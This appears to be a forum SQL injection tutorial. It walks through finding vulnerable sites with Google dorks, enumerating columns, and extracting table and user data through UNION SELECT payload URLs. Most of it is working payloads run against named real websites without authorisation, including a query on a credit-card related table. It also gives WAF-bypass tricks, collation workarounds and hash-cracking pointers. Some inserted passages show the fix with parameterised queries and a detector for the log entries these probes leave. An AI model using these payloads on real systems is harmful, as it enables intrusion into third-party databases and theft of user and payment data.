Contents - Control + F the code (S0.x)
S0.1 - Full tutorial.
S0.2 - String injection. Do you not get an error even after order by 1000?
S0.3 - WAF bypassing. Do you get 404'd when trying to use commands?
S0.4 - Do you get "Illegal mix of collations for operation 'UNION'" when trying to inject?
S0.5 - Getting data from other databases.
S0.6 - Blind SQL Injection
S0.1 - The tutorial
First of all we will want to either find vulnerabilities on a specific site, or find vulnerable sites via dorks.
To find vulnerabilities on a site, we can use google. Type into google,
Code:
site:site.com inurl:.php?id=
If you get no results, you can try
Code:
site:site.com inurl:.php?
To find sites via dorks, it is very simple. Just type into google -
inurl:dork
For example
Code:
inurl:article.php?id=
Here is a list of dorks you could use.
http://pastebin.com/k2FFy1YH
And of course, you could come up with your own.
After we have found a vulnerable site, we will test to see if it is vulnerable to SQL injection. Simply add an ' at the end of the parameter, example -
Code:
.php?id=1'
And if we get any sort of error, it MAY be vulnerable. You can check by using the order by technique.
Add order by 1-- onto the end of your URL, and if it displays normally then we can move on. If you still get an error, chances are it is not vulnerable.
Now that we know the site is vulnerable, we will continue injecting. I have found a site for the purpose of this tutorial.
Code:
http://www.iblist.com/book.php?id=235
We add ' onto the end of the url.
Code:
http://www.iblist.com/book.php?id=235'
And we get an error. Now add
Code:
order by 1--
so
Code:
http://www.iblist.com/book.php?id=235 order by 1--
and we get no error. It's vulnerable.
Now we want to find out the number of columns. To do this there are multiple ways, but the most common are ORDER BY, and GROUP BY. They can be used in the same way.
We will add order by 1, and keep increasing the integer until we get an error. Say we go up by one at a time, and we get an error when we hit 5. This means the site would have 4 columns.
Code:
http://www.iblist.com/book.php?id=235 order by 1--
http://www.iblist.com/book.php?id=235 order by 2--
http://www.iblist.com/book.php?id=235 order by 3-- <- No error
http://www.iblist.com/book.php?id=235 order by 4-- <- No error
http://www.iblist.com/book.php?id=235 order by 5-- <- No error
http://www.iblist.com/book.php?id=235 order by 6-- <- No error
http://www.iblist.com/book.php?id=235 order by 7-- <- No error
http://www.iblist.com/book.php?id=235 order by 8-- <- No error
http://www.iblist.com/book.php?id=235 order by 9-- <- No error
http://www.iblist.com/book.php?id=235 order by 10-- <- No error
http://www.iblist.com/book.php?id=235 order by 11-- <- No error
http://www.iblist.com/book.php?id=235 order by 12-- <- No error
http://www.iblist.com/book.php?id=235 order by 13-- <- No error
http://www.iblist.com/book.php?id=235 order by 14-- <- error
We got no error up until 14. So we know it only has 13 columns.
Now that we know the site has 13 columns, we will find the vulnerable columns. To do this we use
Code:
UNION SELECT
or
Code:
UNION ALL SELECT
followed by the amount of columns. So,
Code:
http://www.iblist.com/book.php?id=235 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Notice it still displays normally. To make it show the vulnerable columns, we have to null the parameter. You can do this by either adding a "-" before the number/text, or simply replacing it with "null".
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
It now displays the vulnerable columns.
You can use any you want; I'll use 2.
Now we want to find out the mysql version. To do this replace the column number you are working with, with either
Code:
version()
or
Code:
@@version
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14--
Ahh, it's running version 5. That's good. If it was <5 you would have to use error based injection since it doesn't have information_schema.
Now we want to find the table names.
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
We use group_concat to gather the table names; in parentheses we put "table_name". We want to get it from information_schema.tables, and we want to get them from the current database (which you can also find out by replacing a vulnerable column with "user()").
We can now see most of the table names.
But notice how it cuts off randomly. That's because group_concat has a limit to the amount of characters it can display. I believe it's 1024 (I may be wrong), but we can get past this.
We will use "concat" instead of group_concat, and use limit.
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database() LIMIT 0,1--
This will display one table at a time, so we can get them all. Increase LIMIT 0,1 to LIMIT 1,1 etc. until you have all the table names.
After going through, I know there are 56 tables.
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database() LIMIT 56,1--
Because if I try 57,1 I get an error.
Now search through the tables until you find something interesting, such as "admin" or "users".
Table 56 happens to be users. Note it down, in case you forget. So we will work with this; if we don't get anything useful we will try and find another table which may contain sensitive data.
Now we want to find out the columns within that table. To do this we will replace concat(table_name) with concat(column_name), replace information_schema.tables with information_schema.columns, and add table_name="tablename" instead of table_schema=database().
So
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name="users"--
But we get an error. To bypass this we will have to use CHAR(charcode)
So users would be
Code:
CHAR(117, 115, 101, 114, 115)
I'd suggest using HackBar to convert it. It is a nifty little addon for firefox.
But it still displays no data. Maybe the column is empty? To find out use "count"
And derp, it returned 0. Fail on my behalf. I was writing this tutorial in real time.
So we will gather data from another table, just so I can show how you do it.
I found another table, it doesn't contain that much useful data, but for the purposes of the tutorial I will show you how to extract data from a table :D
The table I found was "puser"
so
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=CHAR(112, 117, 115, 101, 114)--
And we get.
Code:
id,username
To extract this data we will have to do group_concat(columns) from table
So
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,group_concat(id,username),3,4,5,6,7,8,9,10,11,12,13,14 from puser--
But it looks terribad, not laid out right and hard to tell them apart.
So we will add some hexadecimal values for a colon and a line break.
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,group_concat(id,0x3a,username,0x0a),3,4,5,6,7,8,9,10,11,12,13,14 from puser--
0x3a = :
0x0a = line break
Easier to tell them apart now :) And again, if you can't see them all you can use concat and limit.
If you want to find the username for a specific ID, or vice versa, you can use
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,group_concat(id,0x3a,username,0x0a),3,4,5,6,7,8,9,10,11,12,13,14 from puser where id=1--
Now that you have this data, you can do whatever you want with it. Unfortunately this didn't contain any passwords, but now you know how to extract the column data if there is a passwords column. If it comes out as a long string of letters and digits, it is most likely an MD5 hash. To crack it you can either download MDBruter, or any other MD5 bruteforcer, or see if it has already been cracked by going to
http://hashchecker.de/find.html
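As an added illustration (not part of the original tutorial), here is the defect that makes the order by and UNION SELECT probes above work, beside the fix. It uses a constructed in-memory SQLite database standing in for the book.php?id= page, so the table names and rows are assumptions; the mitigation is type validation plus a bound parameter.

```python
import sqlite3

# Constructed in-memory stand-in for the tutorial's book.php?id= page.
# SQLite replaces MySQL here; the injection mechanics are the same.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE book(id INTEGER, title TEXT, author TEXT);
        INSERT INTO book VALUES (235, 'Some Book', 'Some Author');
        CREATE TABLE puser(id INTEGER, username TEXT);
        INSERT INTO puser VALUES (1, 'alice'), (2, 'bob');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # The flaw behind the tutorial: the raw parameter becomes part of the SQL
    # text, so "235 order by 4--" or "null UNION SELECT ..." runs as SQL.
    sql = "SELECT id, title, author FROM book WHERE id=" + raw_id
    return db.execute(sql).fetchall()

def lookup_safe(db, raw_id):
    # Mitigation: validate the type, then bind the value with a placeholder.
    # The parameter is a value and can never be parsed as SQL syntax.
    try:
        book_id = int(raw_id)
    except ValueError:
        return "rejected"
    return db.execute(
        "SELECT id, title, author FROM book WHERE id=?", (book_id,)).fetchall()

def probe(db, lookup, raw_id):
    # Run one probe and report its rows, or "error" (what shows up as the
    # page error the tutorial looks for).
    try:
        return lookup(db, raw_id)
    except sqlite3.Error:
        return "error"

PROBES = [
    "235",
    "235 order by 3--",                              # within column count
    "235 order by 4--",                              # one past it: error
    "null UNION SELECT 1,username,3 FROM puser--",   # rows from another table
]

def run_probes(lookup):
    db = make_db()
    return {p: probe(db, lookup, p) for p in PROBES}
```

Calling run_probes(lookup_vulnerable) reproduces the tutorial's observations (no error, error, foreign rows), while run_probes(lookup_safe) returns "rejected" for every probe except the plain id.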
S0.2 - String Injection
If you're trying to find out the number of columns for a site, yet when you do order by 999 you don't get an error, you should try string injection next. To do this, simply add
--+
+--+
+--
instead of
--
onto the end of your URL, and add an apostrophe ' onto the end of the parameter, so it would look like
Code:
www.site.com/example.php?id=1 order by 999--
Code:
www.site.com/example.php?id=1' order by 999--+
I hope you enjoyed my tutorial, and that I may have taught you some basics if you are new to SQL injection.
:)
S0.3 - WAF Bypassing
If you're fine injecting, up until the point when you try "UNION SELECT" and you get 404'd, then chances are the site has a Web Application Firewall (WAF).
This blocks out nasty SQL commands that could be a potential threat to the site.
If you're injecting, and you run across this, it is very simple to bypass. There are a few methods, for example -
Alternating between Capitalised/Non-Capitalised.
Code:
http://site.com/example.php?id=null UnIOn SelECT 1,2,3,4,5--
Using comment tags
Code:
/*!*/
Code:
http://site.com/example.php?id=null /*!UNION*/ /*!SELECT*/ 1,2,3,4,5--
Some of the more notable commands/phrases it blocks out in a standard injection are -
Code:
UNION
SELECT
GROUP_CONCAT
CONCAT
INFORMATION_SCHEMA
TABLE_SCHEMA
Note that you can't bypass group_concat, so you have to use /*!Concat*/ to select one at a time. And at the end of the injection, before the --, add LIMIT 0,1 and keep increasing it by 1 to see each value.
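From the defender's side, the case-mixing and /*!...*/ forms above only hide keywords from a matcher that works on the raw URL. The following added example (not from the original post) normalizes requests before matching; the Apache-style log lines are constructed to replay this tutorial's probes, and the signature list covers the terms S0.3 says a WAF looks for.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample (Apache-style) replaying the probes from this
# tutorial, including the case-mixing and /*!...*/ forms from S0.3.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2013:13:55:36 +0000] "GET /book.php?id=235 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2013:13:55:41 +0000] "GET /book.php?id=235%20order%20by%2014-- HTTP/1.1" 500 212
203.0.113.5 - - [10/Oct/2013:13:56:02 +0000] "GET /book.php?id=null%20UnIOn%20SelECT%201,2,3,4,5-- HTTP/1.1" 200 4871
203.0.113.5 - - [10/Oct/2013:13:56:10 +0000] "GET /book.php?id=null+/*!UNION*/+/*!SELECT*/+1,group_concat(table_name),3+from+information_schema.tables-- HTTP/1.1" 200 4990
198.51.100.7 - - [10/Oct/2013:13:57:00 +0000] "GET /book.php?id=236 HTTP/1.1" 200 5110
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Signatures run against the *normalized* request, so keyword casing and
# MySQL comment wrappers cannot hide them.
SIGNATURES = [
    ("order by", re.compile(r"\border\s+by\s+\d+")),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("group_concat", re.compile(r"\bgroup_concat\(")),
    ("concat", re.compile(r"\bconcat\(")),
    ("information_schema", re.compile(r"\binformation_schema\b")),
    ("unhex(hex(", re.compile(r"\bunhex\s*\(\s*hex\s*\(")),
    ("hex literal", re.compile(r"\b0x[0-9a-f]{4,}\b")),
    ("char()", re.compile(r"\bchar\s*\(\s*\d+")),
]

def normalize(target):
    # URL-decode (%20 and + become spaces), drop /*! and */ markers but keep
    # what they wrapped, lower-case, and collapse whitespace.
    s = unquote_plus(target)
    s = re.sub(r"/\*!?|\*/", " ", s)
    return re.sub(r"\s+", " ", s).lower()

def scan(log_text):
    # One record per request that trips at least one signature.
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, target, status = m.groups()
        hits = [name for name, rx in SIGNATURES if rx.search(normalize(target))]
        if hits:
            findings.append({"ip": ip, "time": ts, "status": int(status), "hits": hits})
    return findings
```

scan(SAMPLE_LOG) flags the three probing requests from 203.0.113.5 and nothing from the ordinary lookups; the 500 on the order by 14 request is the same server error the tutorial uses as its signal.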
S0.4 - Illegal mix of collations for operation 'UNION'
This is a common error that a lot of people get, normally when they are trying to use "group_concat", "version()" etc. A lot of the time when people get this error they think the site isn't injectable, and just give up and go find a new site. Well, it's easy to get past this. All you have to do is unhex a hex'd command. For example
Code:
group_concat(unhex(hex(table_name)))
Example on a site -
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(unhex(hex(table_name))) from /*!information_schema*/.tables where table_schema=database()--
You can also use "convert".
Code:
group_concat(CONVERT(table_name USING latin1))
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(CONVERT(table_name USING latin1)) from /*!information_schema*/.tables where table_schema=database()--
The following also work:
uncompress(compress(version()))
cast(version() as char)
aes_decrypt(aes_encrypt(version(),1),1)
binary(version())
CONVERT(version() USING x)
where x is a character set, for example
ascii
binary
latin1
utf8
S0.5 - Getting data from other DBs
Have you ever gone through all the trouble of injecting a site just to find that there are no user tables? Well, chances are there might be, although there might not be. Here we will find out how to get around this, by looking in other databases on the site.
First of all we will need to find the existing databases. To do this you will use this -
Code:
group_concat(schema_name) from information_schema.schemata
Example on a site -
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(CONVERT(schema_name USING latin1)) from /*!information_schema*/.schemata--
Now that we have the database names, you will have to go through them and find the one you want. You might not get them all, since group_concat has a 1024 character limit, but you could always use concat and limit, and go through them 1 by 1.
For simplicity I will use the first DB in there, "CCS_Shopping_Carts". We will do the usual "group_concat(table_name)". But where we normally put "where table_schema=database()", we will add the database we want. You will need to hex the DB name, and add "0x" onto the front of it. You can hex it using any string to hexadecimal converter - http://www.string-functions.com/string-hex.aspx - or using the built-in one in HackBar.
Example -
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(CONVERT(table_name USING latin1)) from /*!information_schema*/.tables where table_schema=0x4343535f53686f7070696e675f4361727473--
Now to get the columns, it's just the same really.
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(CONVERT(column_name USING latin1)) from /*!information_schema*/.columns where table_name=0x61636365707465645f6361726473--
And finally to get the data, you want to specify the database name and the table name like databasename.table. Note that if you're using unhex(hex()) or convert here, it won't work. Just use group_concat, and it will :).
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(accepted_cards_id,0x3a,cart_id,0x3a,credit_card_id,0x0a) from CCS_Shopping_Carts.accepted_cards--
And there we go :).